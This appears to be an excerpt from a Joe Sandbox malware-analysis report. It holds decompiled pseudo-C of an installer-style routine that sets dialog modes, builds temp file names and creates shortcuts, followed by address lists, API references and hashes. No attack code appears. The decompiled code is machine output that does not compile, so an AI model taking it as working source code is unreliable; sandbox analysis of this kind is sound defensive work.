									__eax = E003E1FBB(__ebp - 0x10c, L"HIDE");
									__eax =  ~__eax;
									asm("sbb eax, eax");
									__edi = __edi & __eax;
									__eax = __ebp - 0x10c;
									__eax = E003E1FBB(__ebp - 0x10c, L"MAX");
									__eflags = __eax;
									if(__eax == 0) {
										_push(3);
										_pop(__edi);
									}
									__eax = __ebp - 0x10c;
									__eax = E003E1FBB(__ebp - 0x10c, L"MIN");
									__eflags = __eax;
									if(__eax == 0) {
										_push(6);
										_pop(__edi);
									}
									_push(0x64);
									__eax = __ebp - 0x10c;
									_push(__ebp - 0x10c);
									_push(__esi);
									__esi = E003EAF98();
									__eflags = __esi;
									if(__esi != 0) {
										continue;
									} else {
										goto L98;
									}
								}
								goto L98;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x41a46c - __edi;
										if( *0x41a46c == __edi) {
											 *0x41a46c = 2;
										}
										 *0x419468 = 1;
									}
									goto L178;
								}
								__eax = __ebp - 0x788c;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
								__eax = E003DB690(__eflags, __ebp - 0x788c, 0x800);
								__ebx = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x40e724);
									__ebp - 0x788c = E003D4092(0x41946a, __edi, L"%s%s%u", __ebp - 0x788c);
									__eax = E003DA231(0x41946a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x41946a);
								__eflags =  *(__ebp - 0x588c) - __bx;
								if( *(__ebp - 0x588c) == __bx) {
									goto L178;
								}
								__eflags =  *0x41c575 - __bl;
								if( *0x41c575 != __bl) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x444) = __ax;
								__eax = __ebp - 0x588c;
								_push(0x2c);
								_push(__ebp - 0x588c);
								__eax = E003F22C6(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L122:
									__eflags =  *(__ebp - 0x444) - __bx;
									if( *(__ebp - 0x444) == __bx) {
										__ebp - 0x1b894 = __ebp - 0x588c;
										E003E0602(__ebp - 0x588c, __ebp - 0x1b894, 0x1000) = __ebp - 0x19894;
										__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x19894, 0x200);
									}
									__ebp - 0x588c = E003EADD2(__ebp - 0x588c);
									__eax = 0;
									 *(__ebp - 0x488c) = __ax;
									__ebp - 0x444 = __ebp - 0x588c;
									__eax = E003EA7E4( *(__ebp + 8), __ebp - 0x588c, __ebp - 0x444, 0x24);
									__eflags = __eax - 6;
									if(__eax != 6) {
										__eax = 0;
										 *0x418454 = 1;
										 *0x41946a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
									}
									goto L178;
								}
								__ax =  *(__ebp - 0x588c);
								__esi = __ebx;
								__eflags = __ax;
								if(__ax == 0) {
									goto L122;
								}
								__ecx = __ax & 0x0000ffff;
								while(1) {
									__eflags = __cx - 0x40;
									if(__cx == 0x40) {
										break;
									}
									__eax =  *(__ebp + __esi * 2 - 0x588a) & 0x0000ffff;
									__esi =  &(__esi->i);
									__ecx = __eax;
									__eflags = __ax;
									if(__ax != 0) {
										continue;
									}
									goto L122;
								}
								__ebp - 0x588a = __ebp - 0x588a + __esi * 2;
								__ebp - 0x444 = E003E0602(__ebp - 0x444, __ebp - 0x444, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x588c) = __ax;
								goto L122;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x588c) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x588c;
										_push(__ebp - 0x588c);
										__eax = E003F7625(__ebx, __edi);
										_pop(__ecx);
										 *0x42fc9c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x42fc98 = E003EB48E(__ecx, __edx, __eflags);
								}
								 *0x41c576 = 1;
								goto L178;
							case 9:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L178;
								}
								__eax = 0;
								 *(__ebp - 0x2844) = __ax;
								__eax =  *(__ebp - 0x1b894) & 0x0000ffff;
								__eax = E003F79E9( *(__ebp - 0x1b894) & 0x0000ffff);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									 *(__ebp - 0x14) = 2;
									__eax = 0x42cb82;
								} else {
									__eflags = __eax - 0x54;
									if(__eax == 0x54) {
										 *(__ebp - 0x14) = 7;
										__eax = 0x42bb82;
									} else {
										 *(__ebp - 0x14) = 0x10;
										__eax = 0x42db82;
									}
								}
								__esi = 0x800;
								__ebp - 0x2844 = E003E0602(__ebp - 0x2844, __ebp - 0x2844, 0x800);
								__eax = 0;
								 *(__ebp - 0x9894) = __ax;
								 *(__ebp - 0x1844) = __ax;
								__ebp - 0x19894 = __ebp - 0x688c;
								__eax = E003E0602(__ebp - 0x688c, __ebp - 0x19894, 0x800);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x688c) - __bx;
								if( *(__ebp - 0x688c) != __bx) {
									__ebp - 0x688c = E003DA231(__ebp - 0x688c);
									__eflags = __al;
									if(__al != 0) {
										goto L163;
									}
									__ax =  *(__ebp - 0x688c);
									__esi = __ebp - 0x688c;
									__ebx = __edi;
									__eflags = __ax;
									if(__ax == 0) {
										__esi = 0x800;
										goto L163;
									}
									__edi = __ax & 0x0000ffff;
									do {
										_push(0x20);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di == __ax) {
											L149:
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x688c = E003DA231(__ebp - 0x688c);
											__eflags = __al;
											if(__al == 0) {
												L158:
												__esi->i = __di;
												goto L159;
											}
											__ebp - 0x688c = E003DA243(__ebp - 0x688c);
											__eax = E003DA28F(__eax);
											__eflags = __al;
											if(__al != 0) {
												goto L158;
											}
											_push(0x2f);
											_pop(__ecx);
											__eax =  &(__esi->i);
											__ebx = __esi;
											__eflags = __di - __cx;
											if(__di != __cx) {
												_push(0x20);
												__esi = __eax;
												_pop(__eax);
												while(1) {
													__eflags = __esi->i - __ax;
													if(__esi->i != __ax) {
														break;
													}
													__esi =  &(__esi->i);
													__eflags = __esi;
												}
												__ecx = __ebp - 0x1844;
												__eax = __esi;
												__edx = 0x400;
												L157:
												__eax = E003E0602(__ecx, __eax, __edx);
												 *__ebx = __di;
												goto L159;
											}
											 *(__ebp - 0x1844) = __cx;
											__edx = 0x3ff;
											__ecx = __ebp - 0x1842;
											goto L157;
										}
										_push(0x2f);
										_pop(__eax);
										__eflags = __di - __ax;
										if(__di != __ax) {
											goto L159;
										}
										goto L149;
										L159:
										__esi =  &(__esi->i);
										__eax = __esi->i & 0x0000ffff;
										__edi = __esi->i & 0x0000ffff;
										__eflags = __ax;
									} while (__ax != 0);
									__esi = 0x800;
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										 *__ebx = __ax;
									}
									goto L163;
								} else {
									__ebp - 0x19892 = __ebp - 0x688c;
									E003E0602(__ebp - 0x688c, __ebp - 0x19892, 0x800) = __ebp - 0x688a;
									_push(__ebx);
									_push(__ebp - 0x688a);
									__eax = E003F22C6(__ecx);
									_pop(__ecx);
									_pop(__ecx);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx = 0;
										 *__eax = __cx;
										__ebp - 0x1844 = E003E0602(__ebp - 0x1844, __ebp - 0x1844, 0x400);
									}
									L163:
									__eflags =  *((short*)(__ebp - 0x11894));
									if( *((short*)(__ebp - 0x11894)) != 0) {
										__ebp - 0x9894 = __ebp - 0x11894;
										__eax = E003DB6C4(__ebp - 0x11894, __ebp - 0x9894, __esi);
									}
									__ebp - 0xb894 = __ebp - 0x688c;
									__eax = E003DB6C4(__ebp - 0x688c, __ebp - 0xb894, __esi);
									__eflags =  *(__ebp - 0x2844);
									if(__eflags == 0) {
										__ebp - 0x2844 = E003EB425(__ecx, __ebp - 0x2844,  *(__ebp - 0x14));
									}
									__ebp - 0x2844 = E003DB690(__eflags, __ebp - 0x2844, __esi);
									__eflags =  *((short*)(__ebp - 0x17894));
									if(__eflags != 0) {
										__ebp - 0x17894 = __ebp - 0x2844;
										E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x17894, __esi) = __ebp - 0x2844;
										__eax = E003DB690(__eflags, __ebp - 0x2844, __esi);
									}
									__ebp - 0x2844 = __ebp - 0xc894;
									__eax = E003E0602(__ebp - 0xc894, __ebp - 0x2844, __esi);
									__eflags =  *(__ebp - 0x13894);
									__eax = __ebp - 0x13894;
									if(__eflags == 0) {
										__eax = __ebp - 0x19894;
									}
									__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, __ebp - 0x2844, __esi);
									__eax = __ebp - 0x2844;
									__eflags = E003DB92D(__ebp - 0x2844);
									if(__eflags == 0) {
										L173:
										__ebp - 0x2844 = E003E05DA(__eflags, __ebp - 0x2844, L".lnk", __esi);
										goto L174;
									} else {
										__eflags = __eax;
										if(__eflags == 0) {
											L174:
											__ebx = 0;
											__ebp - 0x2844 = E003DA0B1(0, __ecx, __edi, __ebp, __ebp - 0x2844, 1, 0);
											__ebp - 0xb894 = __ebp - 0xa894;
											E003E0602(__ebp - 0xa894, __ebp - 0xb894, __esi) = __ebp - 0xa894;
											__eax = E003DC2E4(__eflags, __ebp - 0xa894);
											__esi =  *(__ebp - 0x1844) & 0x0000ffff;
											__eax = __ebp - 0x1844;
											__edx =  *(__ebp - 0x9894) & 0x0000ffff;
											__edi = __ebp - 0xa894;
											__ecx =  *(__ebp - 0x15894) & 0x0000ffff;
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff);
											asm("sbb esi, esi");
											__esi =  ~( *(__ebp - 0x1844) & 0x0000ffff) & __ebp - 0x00001844;
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff);
											__eax = __ebp - 0x9894;
											asm("sbb edx, edx");
											__edx =  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894;
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff);
											__eax = __ebp - 0x15894;
											asm("sbb ecx, ecx");
											__ecx =  ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894;
											 *(__ebp - 0xa894) & 0x0000ffff =  ~( *(__ebp - 0xa894) & 0x0000ffff);
											asm("sbb eax, eax");
											 ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi = __ebp - 0x2844;
											__ebp - 0xb894 = E003EA48A( ~( *(__ebp - 0x15894) & 0x0000ffff) & __ebp - 0x00015894, 0, __ebp - 0xb894, __ebp - 0x2844,  ~( *(__ebp - 0xa894) & 0x0000ffff) & __edi, __ecx,  ~( *(__ebp - 0x9894) & 0x0000ffff) & __ebp - 0x00009894, __esi);
											__eflags =  *(__ebp - 0xc894) - __bx;
											if( *(__ebp - 0xc894) != __bx) {
												_push(0);
												__eax = __ebp - 0xc894;
												_push(__ebp - 0xc894);
												_push(5);
												_push(0x1000);
												__eax =  *0x43308c();
											}
											goto L178;
										}
										goto L173;
									}
								}
							case 0xa:
								__eflags = __ebx - 7;
								if(__ebx == 7) {
									 *0x41a470 = 1;
								}
								goto L178;
							case 0xb:
								__eax =  *(__ebp - 0x588c) & 0x0000ffff;
								__eax = E003F79E9( *(__ebp - 0x588c) & 0x0000ffff);
								__eflags = __eax - 0x46;
								if(__eax == 0x46) {
									 *0x418461 = 1;
								} else {
									__eflags = __eax - 0x55;
									if(__eax == 0x55) {
										 *0x418462 = 1;
									} else {
										__eax = 0;
										 *0x418461 = __al;
										 *0x418462 = __al;
									}
								}
								goto L178;
							case 0xc:
								 *0x427b7a = 1;
								__eax = __eax + 0x427b7a;
								_t125 = __esi + 0x39;
								 *_t125 =  *(__esi + 0x39) + __esp;
								__eflags =  *_t125;
								__ebp = 0xffffa774;
								if( *_t125 != 0) {
									_t127 = __ebp - 0x588c; // 0xffff4ee8
									__eax = _t127;
									 *0x40e728 = E003E1FA7(_t127);
								}
								goto L178;
						}
						L4:
						_push(0x1000);
						_push(_t311);
						_push(_t237);
						_t237 = E003EAF98();
						_t311 = _t311 + 0x2000;
						_t308 = _t308 - 1;
						if(_t308 != 0) {
							goto L4;
						} else {
							_t312 = _t308;
							goto L6;
						}
						L178:
						_push(0x1000);
						_t221 = _t316 - 0x15; // 0xffffa75f
						_t222 = _t316 - 0xd; // 0xffffa767
						_t223 = _t316 - 0x588c; // 0xffff4ee8
						_t224 = _t316 - 0xf894; // 0xfffeaee0
						_push( *((intOrPtr*)(_t316 + 0xc)));
						_t232 = E003EB314(_t308, _t316);
						_t293 =  *((intOrPtr*)(_t316 + 0x10));
						 *((intOrPtr*)(_t316 + 0xc)) = _t232;
					} while (_t232 != 0);
				}
			}











                0x003ec744
                0x003ec74e
                0x003ec757
                0x003ed40d
                0x003ed410
                0x003ed418
                0x003ed418
                0x003ec75d
                0x003ec765
                0x003ec769
                0x003ec770
                0x003ec777
                0x003ec778
                0x003ec77b
                0x003ec780
                0x003ec782
                0x003ec787
                0x003ec78e
                0x003ec792
                0x003ec793
                0x003ec795
                0x003ec79b
                0x003ec7a1
                0x003ec7a1
                0x00000000
                0x003ec7bb
                0x003ec7d2
                0x003ec7d6
                0x00000000
                0x003ec7d8
                0x00000000
                0x003ec7d8
                0x003ec7d6
                0x003ec7e0
                0x00000000
                0x00000000
                0x003ec7e6
                0x00000000
                0x003ec7ed
                0x003ec7f0
                0x003ec7f6
                0x003ec803
                0x003ec829
                0x003ec83d
                0x003ec840
                0x003ec84b
                0x003ec98f
                0x003ec98f
                0x003ec99d
                0x003ec9a2
                0x003ec9a4
                0x00000000
                0x00000000
                0x003ec85d
                0x003ec863
                0x003ec869
                0x003ec90f
                0x003ec916
                0x003ec91c
                0x003ec91f
                0x00000000
                0x00000000
                0x003ec928
                0x003ec92e
                0x003ec930
                0x00000000
                0x003ec932
                0x003ec932
                0x003ec934
                0x003ec935
                0x003ec939
                0x003ec94d
                0x003ec952
                0x003ec95c
                0x003ec962
                0x003ec965
                0x003ec937
                0x003ec937
                0x003ec938
                0x00000000
                0x003ec967
                0x003ec975
                0x003ec97b
                0x003ec97d
                0x003ec989
                0x003ec989
                0x00000000
                0x003ec97d
                0x003ec965
                0x003ec930
                0x003ec87e
                0x003ec88b
                0x003ec89c
                0x003ec89f
                0x003ec8a2
                0x003ec8b5
                0x003ec8bc
                0x003ec8c1
                0x003ec8c3
                0x00000000
                0x00000000
                0x003ec8c9
                0x003ec8d0
                0x003ec8d5
                0x003ec8da
                0x003ec8e6
                0x003ec8eb
                0x003ec8ee
                0x003ec8f5
                0x003ec8f7
                0x003ec8f8
                0x003ec902
                0x003ec908
                0x003ec909
                0x00000000
                0x003ec909
                0x003ec8ab
                0x003ec8b1
                0x003ec8b3
                0x00000000
                0x00000000
                0x00000000
                0x003ec8b3
                0x003ec9aa
                0x003ec9b4
                0x003ec9b4
                0x00000000
                0x00000000
                0x003ec9be
                0x003ec9c0
                0x003eca13
                0x003eca18
                0x003eca21
                0x003eca22
                0x003eca28
                0x003eca2d
                0x003eca30
                0x003eca32
                0x003eca44
                0x003eca49
                0x003eca4a
                0x003eca4a
                0x003eca4b
                0x003eca4d
                0x003eca54
                0x003eca59
                0x003eca4d
                0x00000000
                0x00000000
                0x003eca5f
                0x003eca61
                0x003eca71
                0x003eca71
                0x00000000
                0x00000000
                0x003eca7c
                0x003eca7e
                0x00000000
                0x00000000
                0x003eca84
                0x003eca8b
                0x00000000
                0x00000000
                0x003eca91
                0x003eca93
                0x003eca99
                0x003eca9b
                0x003ecaa2
                0x003ecaa3
                0x003ecaaa
                0x003ecaac
                0x003ecaac
                0x003ecab3
                0x003ecab8
                0x003ecabe
                0x003ecac0
                0x00000000
                0x003ecac6
                0x003ecac6
                0x003ecac9
                0x003ecacb
                0x003ecacc
                0x003ecacf
                0x003ecaf8
                0x003ecafb
                0x003ecbe0
                0x003ecbe9
                0x003ecbee
                0x003ecbee
                0x003ecbf0
                0x003ecbf0
                0x003ecbf2
                0x003ecbf4
                0x003ecbfb
                0x003ecc00
                0x003ecc01
                0x003ecc02
                0x003ecc04
                0x003ecc06
                0x003ecc0a
                0x003ecc0c
                0x003ecc0c
                0x003ecc0e
                0x003ecc0e
                0x003ecc0a
                0x003ecc12
                0x003ecc18
                0x003ecc25
                0x003ecc2c
                0x003ecc3c
                0x003ecc46
                0x003ecc54
                0x003ecc5a
                0x003ecc62
                0x003ecc67
                0x003ecc68
                0x003ecc69
                0x003ecc6b
                0x003ecc7f
                0x003ecc7f
                0x00000000
                0x003ecc6b
                0x003ecb01
                0x003ecb01
                0x003ecb04
                0x003ecb11
                0x003ecb11
                0x003ecb14
                0x003ecb16
                0x003ecb17
                0x003ecb19
                0x003ecb1a
                0x003ecb1f
                0x003ecb24
                0x003ecb2a
                0x003ecb2c
                0x003ecb2e
                0x003ecb31
                0x003ecb38
                0x003ecb39
                0x003ecb3f
                0x003ecb40
                0x003ecb43
                0x003ecb44
                0x003ecb45
                0x003ecb4a
                0x003ecb4d
                0x003ecb53
                0x003ecb5c
                0x003ecb5f
                0x003ecb64
                0x003ecb66
                0x003ecb68
                0x003ecb6a
                0x003ecb6a
                0x003ecb6c
                0x003ecb6c
                0x003ecb6e
                0x003ecb6e
                0x003ecb76
                0x003ecb7d
                0x003ecb7f
                0x003ecb86
                0x003ecb8c
                0x003ecb8e
                0x003ecb8f
                0x003ecb97
                0x003ecba6
                0x003ecba6
                0x003ecb97
                0x003ecbb1
                0x003ecbb3
                0x003ecbc2
                0x003ecbc8
                0x003ecbce
                0x003ecbd9
                0x003ecbd9
                0x00000000
                0x003ecbce
                0x003ecb06
                0x003ecb0b
                0x00000000
                0x00000000
                0x00000000
                0x003ecb0b
                0x003ecad1
                0x003ecad5
                0x00000000
                0x00000000
                0x003ecad7
                0x003ecada
                0x003ecadc
                0x003ecadf
                0x00000000
                0x003ecae5
                0x003ecaee
                0x00000000
                0x003ecaee
                0x003ecadf
                0x00000000
                0x003ecc8a
                0x003ecc8b
                0x003ecc90
                0x003ecc92
                0x003ecc95
                0x003ecc95
                0x00000000
                0x003ecccb
                0x003eccd2
                0x003eccd4
                0x003eccd4
                0x003eccd6
                0x003ecd05
                0x003ecd05
                0x003ecd0b
                0x00000000
                0x003ecd0b
                0x003eccd8
                0x003eccd8
                0x003eccdb
                0x003eccf4
                0x003eccfa
                0x003eccfa
                0x00000000
                0x003eccfa
                0x003eccdd
                0x003eccdd
                0x003ecce0
                0x00000000
                0x00000000
                0x003ecce2
                0x003ecce2
                0x003ecce5
                0x00000000
                0x00000000
                0x003ecceb
                0x00000000
                0x00000000
                0x003ecd58
                0x003ecd5a
                0x003ecd61
                0x003ecd62
                0x003ecd68
                0x003ecd70
                0x003ecd72
                0x003ecd75
                0x003ece25
                0x003ece25
                0x003ece29
                0x003ece38
                0x003ece3c
                0x00000000
                0x00000000
                0x003ece42
                0x003ece45
                0x00000000
                0x00000000
                0x003ece4b
                0x003ece4b
                0x003ece4d
                0x003ece4e
                0x003ece4e
                0x003ece4f
                0x003ece50
                0x003ece53
                0x00000000
                0x003ece53
                0x003ece2b
                0x003ece2e
                0x00000000
                0x00000000
                0x003ece34
                0x00000000
                0x003ece34
                0x003ecd7b
                0x003ecd81
                0x003ecd83
                0x003ecd84
                0x003ecd89
                0x003ecd8a
                0x003ecd8b
                0x003ecd8d
                0x003ece22
                0x003ece22
                0x00000000
                0x003ece22
                0x003ecd93
                0x003ecd93
                0x003ecd96
                0x003ecd99
                0x003ecd9b
                0x003ecd9e
                0x003ecda4
                0x003ecda6
                0x003ecda7
                0x003ecdad
                0x003ecdae
                0x003ecdb3
                0x003ecdb6
                0x003ecdb8
                0x00000000
                0x00000000
                0x003ecdba
                0x003ecdbc
                0x003ecdbc
                0x003ecdc4
                0x00000000
                0x00000000
                0x003ecdcb
                0x003ecdd2
                0x003ecdd7
                0x003ecdde
                0x003ecde0
                0x003ecde2
                0x003ecde9
                0x003ecdee
                0x003ecdf0
                0x003ecdf2
                0x003ecdf4
                0x003ecdf4
                0x003ecdfa
                0x003ece01
                0x003ece06
                0x003ece08
                0x003ece0a
                0x003ece0c
                0x003ece0c
                0x003ece0d
                0x003ece0f
                0x003ece15
                0x003ece16
                0x003ece1c
                0x003ece1e
                0x003ece20
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003ece20
                0x00000000
                0x00000000
                0x003ece87
                0x003ece8a
                0x003ed009
                0x003ed00c
                0x003ed012
                0x003ed018
                0x003ed01a
                0x003ed01a
                0x003ed024
                0x003ed024
                0x00000000
                0x003ed00c
                0x003ece90
                0x003ece96
                0x003ecea4
                0x003eceab
                0x003eceb0
                0x003eceb2
                0x003eceb4
                0x003eceb9
                0x003eceb9
                0x003eced1
                0x003ecede
                0x003ecee3
                0x003ecee5
                0x00000000
                0x00000000
                0x003eceb7
                0x003eceb7
                0x003eceb8
                0x003eceb8
                0x003ecef1
                0x003ecef7
                0x003ecefe
                0x00000000
                0x00000000
                0x003ecf04
                0x003ecf0a
                0x00000000
                0x00000000
                0x003ecf10
                0x003ecf12
                0x003ecf19
                0x003ecf1f
                0x003ecf21
                0x003ecf22
                0x003ecf27
                0x003ecf28
                0x003ecf29
                0x003ecf2b
                0x003ecf7b
                0x003ecf7b
                0x003ecf82
                0x003ecf90
                0x003ecfa1
                0x003ecfaf
                0x003ecfaf
                0x003ecfbb
                0x003ecfc0
                0x003ecfc2
                0x003ecfd2
                0x003ecfdc
                0x003ecfe1
                0x003ecfe4
                0x003ecfef
                0x003ecff1
                0x003ecff8
                0x003ecffe
                0x003ecffe
                0x00000000
                0x003ecfe4
                0x003ecf2d
                0x003ecf34
                0x003ecf36
                0x003ecf39
                0x00000000
                0x00000000
                0x003ecf3b
                0x003ecf3e
                0x003ecf3e
                0x003ecf42
                0x00000000
                0x00000000
                0x003ecf44
                0x003ecf4c
                0x003ecf4d
                0x003ecf4f
                0x003ecf52
                0x00000000
                0x00000000
                0x00000000
                0x003ecf54
                0x003ecf61
                0x003ecf6c
                0x003ecf71
                0x003ecf71
                0x003ecf73
                0x00000000
                0x00000000
                0x003ed030
                0x003ed033
                0x003ed035
                0x003ed03c
                0x003ed03e
                0x003ed044
                0x003ed045
                0x003ed04a
                0x003ed04b
                0x003ed04b
                0x003ed050
                0x003ed053
                0x003ed059
                0x003ed059
                0x003ed05e
                0x00000000
                0x00000000
                0x003ed06a
                0x003ed06d
                0x00000000
                0x00000000
                0x003ed073
                0x003ed075
                0x003ed07c
                0x003ed084
                0x003ed08a
                0x003ed08d
                0x003ed0b0
                0x003ed0b7
                0x003ed08f
                0x003ed08f
                0x003ed092
                0x003ed0a2
                0x003ed0a9
                0x003ed094
                0x003ed094
                0x003ed09b
                0x003ed09b
                0x003ed092
                0x003ed0bc
                0x003ed0ca
                0x003ed0cf
                0x003ed0d1
                0x003ed0d8
                0x003ed0e7
                0x003ed0ee
                0x003ed0f3
                0x003ed0f5
                0x003ed0f6
                0x003ed0fd
                0x003ed150
                0x003ed155
                0x003ed157
                0x00000000
                0x00000000
                0x003ed15d
                0x003ed164
                0x003ed16a
                0x003ed16c
                0x003ed16f
                0x003ed221
                0x00000000
                0x003ed221
                0x003ed175
                0x003ed178
                0x003ed178
                0x003ed17a
                0x003ed17b
                0x003ed17e
                0x003ed188
                0x003ed188
                0x003ed18a
                0x003ed194
                0x003ed199
                0x003ed19b
                0x003ed1fd
                0x003ed1fd
                0x00000000
                0x003ed1fd
                0x003ed1a4
                0x003ed1aa
                0x003ed1af
                0x003ed1b1
                0x00000000
                0x00000000
                0x003ed1b3
                0x003ed1b5
                0x003ed1b6
                0x003ed1b9
                0x003ed1bb
                0x003ed1be
                0x003ed1d4
                0x003ed1d6
                0x003ed1d8
                0x003ed1de
                0x003ed1de
                0x003ed1e1
                0x00000000
                0x00000000
                0x003ed1db
                0x003ed1db
                0x003ed1db
                0x003ed1e3
                0x003ed1e9
                0x003ed1eb
                0x003ed1f0
                0x003ed1f3
                0x003ed1f8
                0x00000000
                0x003ed1f8
                0x003ed1c0
                0x003ed1c7
                0x003ed1cc
                0x00000000
                0x003ed1cc
                0x003ed180
                0x003ed182
                0x003ed183
                0x003ed186
                0x00000000
                0x00000000
                0x00000000
                0x003ed200
                0x003ed200
                0x003ed203
                0x003ed206
                0x003ed208
                0x003ed208
                0x003ed211
                0x003ed216
                0x003ed218
                0x003ed21a
                0x003ed21c
                0x003ed21c
                0x00000000
                0x003ed0ff
                0x003ed107
                0x003ed113
                0x003ed119
                0x003ed11a
                0x003ed11b
                0x003ed120
                0x003ed121
                0x003ed122
                0x003ed124
                0x003ed12a
                0x003ed12c
                0x003ed13f
                0x003ed13f
                0x003ed226
                0x003ed226
                0x003ed22e
                0x003ed238
                0x003ed23f
                0x003ed23f
                0x003ed24c
                0x003ed253
                0x003ed258
                0x003ed260
                0x003ed26c
                0x003ed26c
                0x003ed279
                0x003ed27e
                0x003ed286
                0x003ed290
                0x003ed29d
                0x003ed2a4
                0x003ed2a4
                0x003ed2b1
                0x003ed2b8
                0x003ed2bd
                0x003ed2c5
                0x003ed2cb
                0x003ed2cd
                0x003ed2cd
                0x003ed2e2
                0x003ed2e7
                0x003ed2f3
                0x003ed2f5
                0x003ed306
                0x003ed313
                0x00000000
                0x003ed2f7
                0x003ed302
                0x003ed304
                0x003ed318
                0x003ed318
                0x003ed324
                0x003ed331
                0x003ed33d
                0x003ed344
                0x003ed349
                0x003ed350
                0x003ed356
                0x003ed35d
                0x003ed363
                0x003ed36a
                0x003ed36c
                0x003ed36e
                0x003ed370
                0x003ed372
                0x003ed378
                0x003ed37a
                0x003ed37c
                0x003ed37e
                0x003ed384
                0x003ed386
                0x003ed390
                0x003ed393
                0x003ed399
                0x003ed3a8
                0x003ed3ad
                0x003ed3b4
                0x003ed3b6
                0x003ed3b7
                0x003ed3bd
                0x003ed3be
                0x003ed3c0
                0x003ed3c5
                0x003ed3c5
                0x00000000
                0x003ed3b4
                0x00000000
                0x003ed304
                0x003ed2f5
                0x00000000
                0x003ed3cd
                0x003ed3d0
                0x003ed3d2
                0x003ed3d2
                0x00000000
                0x00000000
                0x003ecd17
                0x003ecd1f
                0x003ecd25
                0x003ecd28
                0x003ecd4c
                0x003ecd2a
                0x003ecd2a
                0x003ecd2d
                0x003ecd40
                0x003ecd2f
                0x003ecd2f
                0x003ecd31
                0x003ecd36
                0x003ecd36
                0x003ecd2d
                0x00000000
                0x00000000
                0x003ece5d
                0x003ece5e
                0x003ece63
                0x003ece63
                0x003ece63
                0x003ece66
                0x003ece6b
                0x003ece71
                0x003ece71
                0x003ece7d
                0x003ece7d
                0x00000000
                0x00000000
                0x003ec7a2
                0x003ec7a2
                0x003ec7a7
                0x003ec7a8
                0x003ec7a9
                0x003ec7ae
                0x003ec7b4
                0x003ec7b7
                0x00000000
                0x003ec7b9
                0x003ec7b9
                0x00000000
                0x003ec7b9
                0x003ed3d9
                0x003ed3d9
                0x003ed3de
                0x003ed3e2
                0x003ed3e6
                0x003ed3ed
                0x003ed3f4
                0x003ed3f7
                0x003ed3fc
                0x003ed3ff
                0x003ed402
                0x003ed40c

                APIs
                • __EH_prolog.LIBCMT ref: 003EC744
                  • Part of subcall function 003EB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 003EB3FB
                  • Part of subcall function 003EAF98: _wcschr.LIBVCRUNTIME ref: 003EB033
                • _wcslen.LIBCMT ref: 003ECA0A
                • _wcslen.LIBCMT ref: 003ECA13
                • SetWindowTextW.USER32(?,?), ref: 003ECA71
                • _wcslen.LIBCMT ref: 003ECAB3
                • _wcsrchr.LIBVCRUNTIME ref: 003ECBFB
                • GetDlgItem.USER32(?,00000066), ref: 003ECC36
                • SetWindowTextW.USER32(00000000,?), ref: 003ECC46
                • SendMessageW.USER32(00000000,00000143,00000000,0041A472), ref: 003ECC54
                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003ECC7F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcschr_wcsrchr
                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$>
                • API String ID: 986293930-2327693528
                • Opcode ID: 1a47c4af413b45d1a31a2e62357493fd14b10f7887a7e643eb9811062770da7e
                • Instruction ID: 5671c823622c51abc22ce933ca017d725e8e52b6e99e4aef3d7f1ad6d4a49344
                • Opcode Fuzzy Hash: 1a47c4af413b45d1a31a2e62357493fd14b10f7887a7e643eb9811062770da7e
                • Instruction Fuzzy Hash: 65E18672900269AADF26DBA1DD85EEF73BCAF04310F4041A6F605E7080EB749F858F64
                Uniqueness

